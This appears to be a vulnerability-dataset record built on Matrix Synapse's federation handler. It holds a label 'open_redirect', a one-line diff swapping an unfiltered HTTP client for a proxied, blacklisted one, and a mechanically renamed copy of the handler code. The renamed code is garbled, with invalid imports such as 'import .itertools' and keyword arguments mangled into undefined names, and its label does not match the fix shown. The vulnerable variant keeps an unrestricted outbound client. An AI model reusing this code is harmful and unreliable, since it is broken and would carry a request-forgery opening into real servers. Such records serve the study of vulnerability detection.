                    await self._notify_persisted_event(event, max_stream_token)

            return max_stream_token.stream
async def _notify_persisted_event(
        self, event: EventBase, max_stream_token: RoomStreamToken
    ) -> None:
        """Checks to see if notifier/pushers should be notified about the
        event or not.

        Args:
            event: the event that was just persisted
            max_stream_token: The max_stream_token returned by persist_events
        """
        extra_users = []
        if event.type == EventTypes.Member:
            target_user_id = event.state_key

            # We notify for memberships if its an invite for one of our
            # users
            if event.internal_metadata.is_outlier():
                # Outlier membership: skip only if it's not an invite for a
                # local user.
                if event.membership != Membership.INVITE:
                    if not self.is_mine_id(target_user_id):
                        return

            target_user = UserID.from_string(target_user_id)
            extra_users.append(target_user)
        elif event.internal_metadata.is_outlier():
            # Non-membership outliers are never notified.
            return

        # the event has been persisted so it should have a stream ordering.
        assert event.internal_metadata.stream_ordering

        event_pos = PersistedEventPosition(
            self._instance_name, event.internal_metadata.stream_ordering
        )
        self.notifier.on_new_room_event(
            event, event_pos, max_stream_token, extra_users=extra_users
        )
async def _clean_room_for_join(self, room_id: str) -> None:
"""Called to clean up any data in DB for a given room, ready for the
server to join the room.
Args:
room_id
"""
if self.config.worker_app:
await self._clean_room_for_join_client(room_id)
else:
await self.store.clean_room_for_join(room_id)
async def get_room_complexity(
        self, remote_room_hosts: List[str], room_id: str
    ) -> Optional[dict]:
        """
        Fetch the complexity of a remote room over federation.

        Args:
            remote_room_hosts (list[str]): The remote servers to ask.
            room_id (str): The room ID to ask about.

        Returns:
            Dict containing the complexity metric versions, or None if no
            server could tell us the complexity.
        """
        for candidate_host in remote_room_hosts:
            complexity = await self.federation_client.get_room_complexity(
                candidate_host, room_id
            )
            # The first server that gives us an answer wins.
            if complexity:
                return complexity

        # We fell off the bottom, couldn't get the complexity from anyone. Oh
        # well.
        return None
| open_redirect | {
"code": [
" self.http_client = hs.get_simple_http_client()"
],
"line_no": [
143
]
} | {
"code": [
" self.http_client = hs.get_proxied_blacklisted_http_client()"
],
"line_no": [
143
]
} |
import .itertools
import logging
from collections.abc import Container
from http import HTTPStatus
from typing import TYPE_CHECKING, Dict, Iterable, List, Optional, Sequence, Tuple, Union
import attr
from signedjson.key import decode_verify_key_bytes
from signedjson.sign import verify_signed_json
from unpaddedbase64 import decode_base64
from twisted.internet import defer
from synapse import .event_auth
from synapse.api.constants import (
VAR_188,
Membership,
RejectedReason,
RoomEncryptionAlgorithms,
)
from synapse.api.errors import (
AuthError,
CodeMessageException,
Codes,
FederationDeniedError,
FederationError,
HttpResponseException,
NotFoundError,
RequestSendFailed,
SynapseError,
)
from synapse.api.room_versions import KNOWN_ROOM_VERSIONS, RoomVersion, RoomVersions
from synapse.crypto.event_signing import .compute_event_signature
from synapse.event_auth import .auth_types_for_event
from synapse.events import EventBase
from synapse.events.snapshot import EventContext
from synapse.events.validator import EventValidator
from synapse.handlers._base import BaseHandler
from synapse.http.servlet import assert_params_in_dict
from synapse.logging.context import (
make_deferred_yieldable,
nested_logging_context,
preserve_fn,
run_in_background,
)
from synapse.logging.utils import log_function
from synapse.metrics.background_process_metrics import run_as_background_process
from synapse.replication.http.devices import ReplicationUserDevicesResyncRestServlet
from synapse.replication.http.federation import (
ReplicationCleanRoomRestServlet,
ReplicationFederationSendEventsRestServlet,
ReplicationStoreRoomOnOutlierMembershipRestServlet,
)
from synapse.state import StateResolutionStore
from synapse.storage.databases.main.events_worker import EventRedactBehaviour
from synapse.types import (
JsonDict,
MutableStateMap,
PersistedEventPosition,
RoomStreamToken,
StateMap,
UserID,
get_domain_from_id,
)
from synapse.util.async_helpers import Linearizer, concurrently_execute
from synapse.util.retryutils import NotRetryingDestination
from synapse.util.stringutils import shortstr
from synapse.visibility import filter_events_for_server
if TYPE_CHECKING:
from synapse.server import HomeServer
VAR_0 = logging.getLogger(__name__)
@attr.s(slots=True)
class CLASS_0:
VAR_1 = attr.ib(type=EventBase)
VAR_2 = attr.ib(type=Optional[Sequence[EventBase]], default=None)
VAR_3 = attr.ib(type=Optional[MutableStateMap[EventBase]], default=None)
class CLASS_1(BaseHandler):
def __init__(self, VAR_4: "HomeServer"):
super().__init__(VAR_4)
self.hs = VAR_4
self.store = VAR_4.get_datastore()
self.storage = VAR_4.get_storage()
self.state_store = self.storage.state
self.federation_client = VAR_4.get_federation_client()
self.state_handler = VAR_4.get_state_handler()
self._state_resolution_handler = VAR_4.get_state_resolution_handler()
self.server_name = VAR_4.hostname
self.keyring = VAR_4.get_keyring()
self.action_generator = VAR_4.get_action_generator()
self.is_mine_id = VAR_4.is_mine_id
self.spam_checker = VAR_4.get_spam_checker()
self.event_creation_handler = VAR_4.get_event_creation_handler()
self._message_handler = VAR_4.get_message_handler()
self._server_notices_mxid = VAR_4.config.server_notices_mxid
self.config = VAR_4.config
self.http_client = VAR_4.get_simple_http_client()
self._instance_name = VAR_4.get_instance_name()
self._replication = VAR_4.get_replication_data_handler()
self._send_events = ReplicationFederationSendEventsRestServlet.make_client(VAR_4)
self._clean_room_for_join_client = ReplicationCleanRoomRestServlet.make_client(
VAR_4
)
if VAR_4.config.worker_app:
self._user_device_resync = ReplicationUserDevicesResyncRestServlet.make_client(
VAR_4
)
self._maybe_store_room_on_outlier_membership = ReplicationStoreRoomOnOutlierMembershipRestServlet.make_client(
VAR_4
)
else:
self._device_list_updater = VAR_4.get_device_handler().device_list_updater
self._maybe_store_room_on_outlier_membership = (
self.store.maybe_store_room_on_outlier_membership
)
self.room_queues = {} # type: Dict[str, List[Tuple[EventBase, str]]]
self._room_pdu_linearizer = Linearizer("fed_room_pdu")
self.third_party_event_rules = VAR_4.get_third_party_event_rules()
self._ephemeral_messages_enabled = VAR_4.config.enable_ephemeral_messages
async def FUNC_0(self, VAR_5, VAR_6, VAR_7=False) -> None:
VAR_11 = VAR_6.room_id
VAR_12 = VAR_6.event_id
VAR_0.info("handling received PDU: %s", VAR_6)
VAR_51 = await self.store.get_event(
VAR_12, allow_none=True, allow_rejected=True
)
VAR_52 = VAR_51 and (
not VAR_51.internal_metadata.is_outlier()
or VAR_6.internal_metadata.is_outlier()
)
if VAR_52:
VAR_0.debug("[%s %s]: Already VAR_54 pdu", VAR_11, VAR_12)
return
try:
self._sanity_check_event(VAR_6)
except SynapseError as err:
VAR_0.warning(
"[%s %s] Received VAR_1 failed sanity checks", VAR_11, VAR_12
)
raise FederationError("ERROR", err.code, err.msg, affected=VAR_6.event_id)
if VAR_11 in self.room_queues:
VAR_0.info(
"[%s %s] Queuing PDU from %s for now: join in progress",
VAR_11,
VAR_12,
VAR_5,
)
self.room_queues[VAR_11].append((VAR_6, VAR_5))
return
VAR_53 = await self.auth.check_host_in_room(VAR_11, self.server_name)
if not VAR_53:
VAR_0.info(
"[%s %s] Ignoring PDU from %s as we're not in the room",
VAR_11,
VAR_12,
VAR_5,
)
return None
VAR_2 = None
if not VAR_6.internal_metadata.is_outlier():
VAR_9 = await self.get_min_depth_for_context(VAR_6.room_id)
VAR_0.debug("[%s %s] VAR_9: %d", VAR_11, VAR_12, VAR_9)
VAR_8 = set(VAR_6.prev_event_ids())
VAR_54 = await self.store.have_events_in_timeline(VAR_8)
if VAR_9 is not None and VAR_6.depth < VAR_9:
VAR_6.internal_metadata.outlier = True
elif VAR_9 is not None and VAR_6.depth > VAR_9:
VAR_191 = VAR_8 - VAR_54
if VAR_7 and VAR_191:
VAR_0.info(
"[%s %s] Acquiring room lock to fetch %d VAR_37 prev_events: %s",
VAR_11,
VAR_12,
len(VAR_191),
shortstr(VAR_191),
)
with (await self._room_pdu_linearizer.queue(VAR_6.room_id)):
VAR_0.info(
"[%s %s] Acquired room lock to fetch %d VAR_37 prev_events",
VAR_11,
VAR_12,
len(VAR_191),
)
try:
await self._get_missing_events_for_pdu(
VAR_5, VAR_6, VAR_8, VAR_9
)
except Exception as VAR_170:
raise Exception(
"Error fetching VAR_37 prev_events for %s: %s"
% (VAR_12, VAR_170)
) from VAR_170
VAR_54 = await self.store.have_events_in_timeline(VAR_8)
if not VAR_8 - VAR_54:
VAR_0.info(
"[%s %s] Found all VAR_37 prev_events",
VAR_11,
VAR_12,
)
if VAR_8 - VAR_54:
if VAR_7:
VAR_0.warning(
"[%s %s] Rejecting: failed to fetch %d prev VAR_20: %s",
VAR_11,
VAR_12,
len(VAR_8 - VAR_54),
shortstr(VAR_8 - VAR_54),
)
raise FederationError(
"ERROR",
403,
(
"Your server isn't divulging details about prev_events "
"referenced in this VAR_1."
),
affected=VAR_6.event_id,
)
VAR_0.info(
"Event %s is VAR_37 prev_events: calculating VAR_2 for a "
"backwards extremity",
VAR_12,
)
VAR_60 = {VAR_12: VAR_6}
try:
VAR_192 = await self.state_store.get_state_groups_ids(VAR_11, VAR_54)
VAR_193 = list(VAR_192.values()) # type: List[StateMap[str]]
del VAR_192
for p in VAR_8 - VAR_54:
VAR_0.info(
"Requesting VAR_2 at VAR_37 VAR_200 %s", VAR_12,
)
with nested_logging_context(p):
(VAR_62, VAR_166,) = await self._get_state_for_room(
VAR_5, VAR_11, p, VAR_13=True
)
VAR_202 = {
(VAR_204.type, VAR_204.state_key): VAR_204.event_id for VAR_204 in VAR_62
}
VAR_193.append(VAR_202)
for VAR_204 in VAR_62:
VAR_60[VAR_204.event_id] = VAR_204
VAR_28 = await self.store.get_room_version_id(VAR_11)
VAR_87 = await self._state_resolution_handler.resolve_events_with_store(
VAR_11,
VAR_28,
VAR_193,
VAR_60,
state_res_store=StateResolutionStore(self.store),
)
VAR_194 = await self.store.get_events(
list(VAR_87.values()),
get_prev_content=False,
redact_behaviour=EventRedactBehaviour.AS_IS,
)
VAR_60.update(VAR_194)
VAR_2 = [VAR_60[VAR_170] for VAR_170 in VAR_87.values()]
except Exception:
VAR_0.warning(
"[%s %s] Error attempting to VAR_85 VAR_2 at VAR_37 "
"prev_events",
VAR_11,
VAR_12,
exc_info=True,
)
raise FederationError(
"ERROR",
403,
"We can't get valid VAR_2 history.",
affected=VAR_12,
)
await self._process_received_pdu(VAR_5, VAR_6, VAR_2=state)
async def FUNC_1(self, VAR_5, VAR_6, VAR_8, VAR_9):
VAR_11 = VAR_6.room_id
VAR_12 = VAR_6.event_id
VAR_54 = await self.store.have_events_in_timeline(VAR_8)
if not VAR_8 - VAR_54:
return
VAR_55 = await self.store.get_latest_event_ids_in_room(VAR_11)
VAR_56 = set(VAR_55)
VAR_56 |= VAR_54
VAR_0.info(
"[%s %s]: Requesting VAR_37 VAR_20 between %s and %s",
VAR_11,
VAR_12,
shortstr(VAR_56),
VAR_12,
)
try:
VAR_65 = await self.federation_client.get_missing_events(
VAR_5,
VAR_11,
earliest_events_ids=list(VAR_56),
VAR_39=[VAR_6],
VAR_17=10,
VAR_9=min_depth,
timeout=60000,
)
except (RequestSendFailed, HttpResponseException, NotRetryingDestination) as VAR_170:
VAR_0.warning(
"[%s %s]: Failed to get prev_events: %s", VAR_11, VAR_12, VAR_170
)
return
VAR_0.info(
"[%s %s]: Got %d prev_events: %s",
VAR_11,
VAR_12,
len(VAR_65),
shortstr(VAR_65),
)
VAR_65.sort(VAR_144=lambda VAR_204: x.depth)
for VAR_21 in VAR_65:
VAR_0.info(
"[%s %s] Handling received VAR_200 %s",
VAR_11,
VAR_12,
VAR_21.event_id,
)
with nested_logging_context(VAR_21.event_id):
try:
await self.on_receive_pdu(VAR_5, VAR_21, VAR_7=False)
except FederationError as VAR_170:
if VAR_170.code == 403:
VAR_0.warning(
"[%s %s] Received VAR_200 %s failed history check.",
VAR_11,
VAR_12,
VAR_21.event_id,
)
else:
raise
async def FUNC_2(
self,
VAR_10: str,
VAR_11: str,
VAR_12: str,
VAR_13: bool = False,
) -> Tuple[List[EventBase], List[EventBase]]:
(
VAR_57,
VAR_58,
) = await self.federation_client.get_room_state_ids(
VAR_10, VAR_11, VAR_12=event_id
)
VAR_59 = set(VAR_57 + VAR_58)
if VAR_13:
VAR_59.add(VAR_12)
VAR_60 = await self._get_events_from_store_or_dest(
VAR_10, VAR_11, VAR_59
)
VAR_61 = VAR_59 - VAR_60.keys()
if VAR_61:
VAR_0.warning(
"Failed to fetch VAR_37 VAR_2/VAR_89 VAR_20 for %s %s",
VAR_12,
VAR_61,
)
VAR_62 = [
VAR_60[VAR_160] for VAR_160 in VAR_57 if VAR_160 in VAR_60
]
if VAR_13:
VAR_154 = VAR_60.get(VAR_12)
if not VAR_154:
raise Exception("Unable to get VAR_37 VAR_200 %s" % (VAR_12,))
if VAR_154.is_state() and VAR_154.rejected_reason is None:
VAR_62.append(VAR_154)
VAR_63 = [VAR_60[VAR_160] for VAR_160 in VAR_58 if VAR_160 in VAR_60]
VAR_63.sort(VAR_144=lambda VAR_170: VAR_170.depth)
return VAR_62, VAR_63
async def FUNC_3(
self, VAR_10: str, VAR_11: str, VAR_14: Iterable[str]
) -> Dict[str, EventBase]:
VAR_64 = await self.store.get_events(VAR_14, allow_rejected=True)
VAR_65 = set(VAR_14) - VAR_64.keys()
if VAR_65:
VAR_0.debug(
"Fetching unknown VAR_2/VAR_89 VAR_20 %s for room %s",
VAR_65,
VAR_11,
)
await self._get_events_and_persist(
VAR_10=destination, VAR_11=room_id, VAR_20=VAR_65
)
VAR_64.update(
(await self.store.get_events(VAR_65, allow_rejected=True))
)
VAR_66 = [
(VAR_12, VAR_1.room_id)
for VAR_12, VAR_1 in VAR_64.items()
if VAR_1.room_id != VAR_11
]
for bad_event_id, bad_room_id in VAR_66:
VAR_0.warning(
"Remote server %s claims VAR_1 %s in room %s is an VAR_89/VAR_2 "
"event in room %s",
VAR_10,
bad_event_id,
bad_room_id,
VAR_11,
)
del VAR_64[bad_event_id]
return VAR_64
async def FUNC_4(
self, VAR_5: str, VAR_1: EventBase, VAR_2: Optional[Iterable[EventBase]],
):
VAR_11 = VAR_1.room_id
VAR_12 = VAR_1.event_id
VAR_0.debug("[%s %s] Processing VAR_1: %s", VAR_11, VAR_12, VAR_1)
try:
await self._handle_new_event(VAR_5, VAR_1, VAR_2=state)
except AuthError as VAR_170:
raise FederationError("ERROR", VAR_170.code, VAR_170.msg, affected=VAR_1.event_id)
if VAR_1.type == VAR_188.Encrypted:
VAR_155 = VAR_1.content.get("device_id")
VAR_156 = VAR_1.content.get("sender_key")
VAR_157 = await self.store.get_cached_devices_for_user(VAR_1.sender)
VAR_158 = False # Whether we should VAR_158 VAR_159 lists.
VAR_159 = None
if VAR_155 is not None:
VAR_159 = VAR_157.get(VAR_155)
if VAR_159 is None:
VAR_0.info(
"Received VAR_1 from remote VAR_159 not in our cache: %s %s",
VAR_1.sender,
VAR_155,
)
VAR_158 = True
if VAR_156 is not None:
VAR_186 = [] # type: Container[str]
if VAR_159:
VAR_195 = VAR_159.get("keys", {}).get("keys", {})
if (
VAR_1.content.get("algorithm")
== RoomEncryptionAlgorithms.MEGOLM_V1_AES_SHA2
):
VAR_199 = "curve25519:%s" % (VAR_155,)
VAR_186 = [VAR_195.get(VAR_199)]
else:
VAR_186 = VAR_195.values()
elif VAR_155:
pass
else:
VAR_186 = [
VAR_144
for VAR_159 in VAR_157.values()
for VAR_144 in VAR_159.get("keys", {}).get("keys", {}).values()
]
if VAR_156 not in VAR_186:
VAR_0.info(
"Received VAR_1 from remote VAR_159 with unexpected VAR_15 VAR_144: %s %s: %s",
VAR_1.sender,
VAR_155 or "<no VAR_155>",
VAR_156,
)
VAR_158 = True
if VAR_158:
run_as_background_process(
"resync_device_due_to_pdu", self._resync_device, VAR_1.sender
)
async def FUNC_5(self, VAR_15: str) -> None:
try:
await self.store.mark_remote_user_device_cache_as_stale(VAR_15)
if self.config.worker_app:
await self._user_device_resync(VAR_27=VAR_15)
else:
await self._device_list_updater.user_device_resync(VAR_15)
except Exception:
VAR_0.exception("Failed to VAR_158 VAR_159 for %s", VAR_15)
@log_function
async def FUNC_6(self, VAR_16, VAR_11, VAR_17, VAR_18):
if VAR_16 == self.server_name:
raise SynapseError(400, "Can't FUNC_6 from self.")
VAR_20 = await self.federation_client.backfill(
VAR_16, VAR_11, VAR_17=limit, VAR_18=extremities
)
if not VAR_20:
return []
VAR_67 = await self.store.have_events_in_timeline(
{VAR_170.event_id for VAR_170 in VAR_20}
)
VAR_20 = [VAR_170 for VAR_170 in VAR_20 if VAR_170.event_id not in VAR_67]
if not VAR_20:
return []
VAR_60 = {VAR_170.event_id: VAR_170 for VAR_170 in VAR_20}
VAR_14 = {VAR_170.event_id for VAR_170 in VAR_20}
VAR_68 = [VAR_21.event_id for VAR_21 in VAR_20 if set(VAR_21.prev_event_ids()) - VAR_14]
VAR_0.info("backfill: Got %d VAR_20 with %d edges", len(VAR_20), len(VAR_68))
VAR_3 = {}
VAR_69 = {}
VAR_70 = {}
for VAR_160 in VAR_68:
VAR_2, VAR_89 = await self._get_state_for_room(
VAR_10=VAR_16,
VAR_11=room_id,
VAR_12=VAR_160,
VAR_13=False,
)
VAR_3.update({a.event_id: a for a in VAR_89})
VAR_3.update({s.event_id: s for s in VAR_2})
VAR_69.update({s.event_id: s for s in VAR_2})
VAR_70[VAR_160] = VAR_2
VAR_71 = {
a_id
for VAR_1 in VAR_20
+ list(VAR_69.values())
+ list(VAR_3.values())
for a_id in VAR_1.auth_event_ids()
}
VAR_3.update(
{VAR_160: VAR_60[VAR_160] for VAR_160 in VAR_71 if VAR_160 in VAR_60}
)
VAR_72 = []
for VAR_160 in VAR_70:
VAR_21 = VAR_60[VAR_160]
assert not VAR_21.internal_metadata.is_outlier()
VAR_72.append(
CLASS_0(
VAR_1=VAR_21,
VAR_2=VAR_70[VAR_160],
VAR_3={
(
auth_events[a_id].type,
VAR_3[a_id].state_key,
): VAR_3[a_id]
for a_id in VAR_21.auth_event_ids()
if a_id in VAR_3
},
)
)
if VAR_72:
await self._handle_new_events(VAR_16, VAR_11, VAR_72, VAR_33=True)
VAR_20.sort(VAR_144=lambda VAR_170: VAR_170.depth)
for VAR_1 in VAR_20:
if VAR_1 in VAR_70:
continue
assert not VAR_1.internal_metadata.is_outlier()
await self._handle_new_event(VAR_16, VAR_1, VAR_33=True)
return VAR_20
async def FUNC_7(
self, VAR_11: str, VAR_19: int, VAR_17: int
) -> bool:
VAR_18 = await self.store.get_oldest_events_with_depth_in_room(VAR_11)
if not VAR_18:
VAR_0.debug("Not backfilling as no extremeties found.")
return False
VAR_73 = await self.store.get_successor_events(list(VAR_18))
VAR_74 = await self.store.get_events(
VAR_73,
redact_behaviour=EventRedactBehaviour.AS_IS,
get_prev_content=False,
)
VAR_75 = await filter_events_for_server(
self.storage,
self.server_name,
list(VAR_74.values()),
redact=False,
check_history_visibility_only=True,
)
if not VAR_75:
return False
VAR_76 = sorted(VAR_18.items(), VAR_144=lambda VAR_170: -int(VAR_170[1]))
VAR_77 = VAR_76[0][1]
if VAR_19 - 2 * VAR_17 > VAR_77:
VAR_0.debug(
"Not backfilling as we don't need to. %d < %d - 2 * %d",
VAR_77,
VAR_19,
VAR_17,
)
return False
VAR_0.debug(
"room_id: %s, FUNC_6: VAR_19: %s, VAR_77: %s, extrems: %s",
VAR_11,
VAR_19,
VAR_77,
VAR_76,
)
VAR_78 = [
t for t in VAR_76 if int(t[1]) <= VAR_19
]
if VAR_78:
VAR_76 = VAR_78
VAR_18 = dict(VAR_76[:5])
VAR_79 = await self.state_handler.get_current_state(VAR_11)
def FUNC_46(VAR_2):
VAR_161 = [
(state_key, int(VAR_1.depth))
for (e_type, state_key), VAR_1 in VAR_2.items()
if e_type == VAR_188.Member and VAR_1.membership == Membership.JOIN
]
VAR_162 = {} # type: Dict[str, int]
for u, d in VAR_161:
try:
VAR_196 = get_domain_from_id(u)
VAR_197 = VAR_162.get(VAR_196)
if VAR_197:
VAR_162[VAR_196] = min(d, VAR_197)
else:
VAR_162[VAR_196] = d
except Exception:
pass
return sorted(VAR_162.items(), VAR_144=lambda d: d[1])
VAR_80 = FUNC_46(VAR_79)
VAR_81 = [
domain for domain, depth in VAR_80 if domain != self.server_name
]
async def FUNC_47(VAR_82):
for VAR_196 in VAR_82:
try:
await self.backfill(
VAR_196, VAR_11, VAR_17=100, VAR_18=extremities
)
return True
except SynapseError as VAR_170:
VAR_0.info("Failed to FUNC_6 from %s because %s", VAR_196, VAR_170)
continue
except HttpResponseException as VAR_170:
if 400 <= VAR_170.code < 500:
raise VAR_170.to_synapse_error()
VAR_0.info("Failed to FUNC_6 from %s because %s", VAR_196, VAR_170)
continue
except CodeMessageException as VAR_170:
if 400 <= VAR_170.code < 500:
raise
VAR_0.info("Failed to FUNC_6 from %s because %s", VAR_196, VAR_170)
continue
except NotRetryingDestination as VAR_170:
VAR_0.info(str(VAR_170))
continue
except RequestSendFailed as VAR_170:
VAR_0.info("Failed to get FUNC_6 from %s because %s", VAR_196, VAR_170)
continue
except FederationDeniedError as VAR_170:
VAR_0.info(VAR_170)
continue
except Exception as VAR_170:
VAR_0.exception("Failed to FUNC_6 from %s because %s", VAR_196, VAR_170)
continue
return False
VAR_83 = await FUNC_47(VAR_81)
if VAR_83:
return True
VAR_84 = set(VAR_81)
VAR_84.add(self.server_name)
VAR_14 = list(VAR_18.keys())
VAR_0.debug("calling resolve_state_groups in _maybe_backfill")
VAR_85 = preserve_fn(self.state_handler.resolve_state_groups_for_events)
VAR_86 = await make_deferred_yieldable(
defer.gatherResults(
[VAR_85(VAR_11, [VAR_170]) for VAR_170 in VAR_14], consumeErrors=True
)
)
VAR_86 = dict(zip(VAR_14, [s.state for s in VAR_86]))
VAR_87 = await self.store.get_events(
[VAR_160 for ids in VAR_86.values() for VAR_160 in ids.values()],
get_prev_content=False,
)
VAR_86 = {
VAR_144: {
k: VAR_87[VAR_160]
for k, VAR_160 in state_dict.items()
if VAR_160 in VAR_87
}
for VAR_144, state_dict in VAR_86.items()
}
for VAR_160, VAR_166 in VAR_76:
VAR_81 = FUNC_46(VAR_86[VAR_160])
VAR_83 = await FUNC_47(
[VAR_196 for VAR_196, VAR_166 in VAR_81 if VAR_196 not in VAR_84]
)
if VAR_83:
return True
VAR_84.update(VAR_196 for VAR_196, VAR_166 in VAR_81)
return False
async def FUNC_8(
self, VAR_10: str, VAR_11: str, VAR_20: Iterable[str]
):
VAR_28 = await self.store.get_room_version(VAR_11)
VAR_60 = {} # type: Dict[str, EventBase]
async def FUNC_48(VAR_12: str):
with nested_logging_context(VAR_12):
try:
VAR_1 = await self.federation_client.get_pdu(
[VAR_10], VAR_12, VAR_28, outlier=True,
)
if VAR_1 is None:
VAR_0.warning(
"Server %s didn't return VAR_1 %s", VAR_10, VAR_12,
)
return
VAR_60[VAR_1.event_id] = VAR_1
except Exception as VAR_170:
VAR_0.warning(
"Error fetching VAR_37 VAR_2/VAR_89 VAR_1 %s: %s %s",
VAR_12,
type(VAR_170),
e,
)
await concurrently_execute(FUNC_48, VAR_20, 5)
VAR_3 = [
aid
for VAR_1 in VAR_60.values()
for aid in VAR_1.auth_event_ids()
if aid not in VAR_60
]
VAR_88 = await self.store.get_events(
VAR_3, allow_rejected=True,
)
VAR_34 = []
for VAR_1 in VAR_60.values():
VAR_89 = {}
for auth_event_id in VAR_1.auth_event_ids():
VAR_187 = VAR_88.get(auth_event_id) or VAR_60.get(auth_event_id)
if VAR_187:
VAR_89[(VAR_187.type, VAR_187.state_key)] = VAR_187
else:
VAR_0.info("Missing VAR_89 VAR_1 %s", auth_event_id)
VAR_34.append(CLASS_0(VAR_1, None, VAR_89))
await self._handle_new_events(
VAR_10, VAR_11, VAR_34,
)
def FUNC_9(self, VAR_21):
if len(VAR_21.prev_event_ids()) > 20:
VAR_0.warning(
"Rejecting VAR_1 %s which has %i prev_events",
VAR_21.event_id,
len(VAR_21.prev_event_ids()),
)
raise SynapseError(HTTPStatus.BAD_REQUEST, "Too many prev_events")
if len(VAR_21.auth_event_ids()) > 10:
VAR_0.warning(
"Rejecting VAR_1 %s which has %i auth_events",
VAR_21.event_id,
len(VAR_21.auth_event_ids()),
)
raise SynapseError(HTTPStatus.BAD_REQUEST, "Too many auth_events")
async def FUNC_10(self, VAR_22, VAR_1):
VAR_6 = await self.federation_client.send_invite(
VAR_10=VAR_22,
VAR_11=VAR_1.room_id,
VAR_12=VAR_1.event_id,
VAR_6=VAR_1,
)
return VAR_6
async def FUNC_11(self, VAR_12: str) -> List[EventBase]:
VAR_1 = await self.store.get_event(VAR_12)
VAR_89 = await self.store.get_auth_chain(
list(VAR_1.auth_event_ids()), include_given=True
)
return list(VAR_89)
async def FUNC_12(
self, VAR_23: Iterable[str], VAR_11: str, VAR_24: str, VAR_25: JsonDict
) -> Tuple[str, int]:
assert self.config.worker.worker_app is None
VAR_0.debug("Joining %s to %s", VAR_24, VAR_11)
VAR_5, VAR_1, VAR_90 = await self._make_and_verify_event(
VAR_23,
VAR_11,
VAR_24,
"join",
VAR_25,
VAR_30={"ver": KNOWN_ROOM_VERSIONS},
)
assert VAR_11 not in self.room_queues
self.room_queues[VAR_11] = []
await self._clean_room_for_join(VAR_11)
VAR_91 = set()
try:
VAR_98 = list(VAR_23)
try:
VAR_98.remove(VAR_5)
VAR_98.insert(0, VAR_5)
except ValueError:
pass
VAR_117 = await self.federation_client.send_join(
VAR_98, VAR_1, VAR_90
)
VAR_5 = VAR_117["origin"]
VAR_2 = VAR_117["state"]
VAR_63 = VAR_117["auth_chain"]
VAR_63.sort(VAR_144=lambda VAR_170: VAR_170.depth)
VAR_91.update([s.event_id for s in VAR_2])
VAR_91.update([a.event_id for a in VAR_63])
VAR_91.add(VAR_1.event_id)
VAR_0.debug("do_invite_join VAR_63: %s", VAR_63)
VAR_0.debug("do_invite_join VAR_2: %s", VAR_2)
VAR_0.debug("do_invite_join VAR_1: %s", VAR_1)
await self.store.upsert_room_on_join(
VAR_11=room_id, VAR_28=VAR_90,
)
VAR_163 = await self._persist_auth_tree(
VAR_5, VAR_11, VAR_63, VAR_2, VAR_1, VAR_90
)
await self._replication.wait_for_stream_position(
self.config.worker.events_shard_config.get_instance(VAR_11),
"events",
VAR_163,
)
VAR_164 = await self.store.get_room_predecessor(VAR_11)
if not VAR_164 or not isinstance(VAR_164.get("room_id"), str):
return VAR_1.event_id, VAR_163
VAR_165 = VAR_164["room_id"]
VAR_0.debug(
"Found VAR_164 for %s during remote join: %s", VAR_11, VAR_165
)
VAR_143 = self.hs.get_room_member_handler()
await VAR_143.transfer_room_state_on_room_upgrade(
VAR_165, VAR_11
)
VAR_0.debug("Finished joining %s to %s", VAR_24, VAR_11)
return VAR_1.event_id, VAR_163
finally:
VAR_26 = self.room_queues[VAR_11]
del self.room_queues[VAR_11]
run_in_background(self._handle_queued_pdus, VAR_26)
async def FUNC_13(self, VAR_26):
for p, VAR_5 in VAR_26:
try:
VAR_0.info(
"Processing queued PDU %s which was received "
"while we were joining %s",
p.event_id,
p.room_id,
)
with nested_logging_context(p.event_id):
await self.on_receive_pdu(VAR_5, p, VAR_7=True)
except Exception as VAR_170:
VAR_0.warning(
"Error handling queued PDU %s from %s: %s", p.event_id, VAR_5, VAR_170
)
async def FUNC_14(
self, VAR_5: str, VAR_11: str, VAR_27: str
) -> EventBase:
if get_domain_from_id(VAR_27) != VAR_5:
VAR_0.info(
"Got /make_join request for user %r from different VAR_5 %s, ignoring",
VAR_27,
VAR_5,
)
raise SynapseError(403, "User not from origin", Codes.FORBIDDEN)
VAR_28 = await self.store.get_room_version_id(VAR_11)
VAR_53 = await self.auth.check_host_in_room(VAR_11, self.server_name)
if not VAR_53:
VAR_0.info(
"Got /make_join request for room %s we are no longer in", VAR_11,
)
raise NotFoundError("Not an active room on this server")
VAR_92 = {"membership": Membership.JOIN}
VAR_93 = self.event_builder_factory.new(
VAR_28,
{
"type": VAR_188.Member,
"content": VAR_92,
"room_id": VAR_11,
"sender": VAR_27,
"state_key": VAR_27,
},
)
try:
VAR_1, VAR_32 = await self.event_creation_handler.create_new_client_event(
VAR_93=builder
)
except SynapseError as VAR_170:
VAR_0.warning("Failed to create join to %s because %s", VAR_11, VAR_170)
raise
await self.auth.check_from_context(
VAR_28, VAR_1, VAR_32, do_sig_check=False
)
return VAR_1
async def FUNC_15(self, VAR_5, VAR_6):
VAR_1 = VAR_6
VAR_0.debug(
"on_send_join_request from %s: Got VAR_1: %s, signatures: %s",
VAR_5,
VAR_1.event_id,
VAR_1.signatures,
)
if get_domain_from_id(VAR_1.sender) != VAR_5:
VAR_0.info(
"Got /send_join request for user %r from different VAR_5 %s",
VAR_1.sender,
VAR_5,
)
raise SynapseError(403, "User not from origin", Codes.FORBIDDEN)
VAR_1.internal_metadata.outlier = False
VAR_1.internal_metadata.send_on_behalf_of = VAR_5
VAR_32 = await self._handle_new_event(VAR_5, VAR_1)
VAR_0.debug(
"on_send_join_request: After FUNC_26: %s, sigs: %s",
VAR_1.event_id,
VAR_1.signatures,
)
VAR_94 = await VAR_32.get_prev_state_ids()
VAR_95 = list(VAR_94.values())
VAR_63 = await self.store.get_auth_chain(VAR_95)
VAR_2 = await self.store.get_events(list(VAR_94.values()))
return {"state": list(VAR_2.values()), "auth_chain": VAR_63}
async def FUNC_16(
self, VAR_5: str, VAR_1: EventBase, VAR_28: RoomVersion
):
if VAR_1.state_key is None:
raise SynapseError(400, "The invite VAR_1 did not have a VAR_2 key")
VAR_96 = await self.store.is_room_blocked(VAR_1.room_id)
if VAR_96:
raise SynapseError(403, "This room has been blocked on this server")
if self.hs.config.block_non_admin_invites:
raise SynapseError(403, "This server does not accept room invites")
if not self.spam_checker.user_may_invite(
VAR_1.sender, VAR_1.state_key, VAR_1.room_id
):
raise SynapseError(
403, "This user is not permitted to send invites to this server/user"
)
VAR_29 = VAR_1.content.get("membership")
if VAR_1.type != VAR_188.Member or VAR_29 != Membership.INVITE:
raise SynapseError(400, "The VAR_1 was not an m.room.member invite event")
VAR_97 = get_domain_from_id(VAR_1.sender)
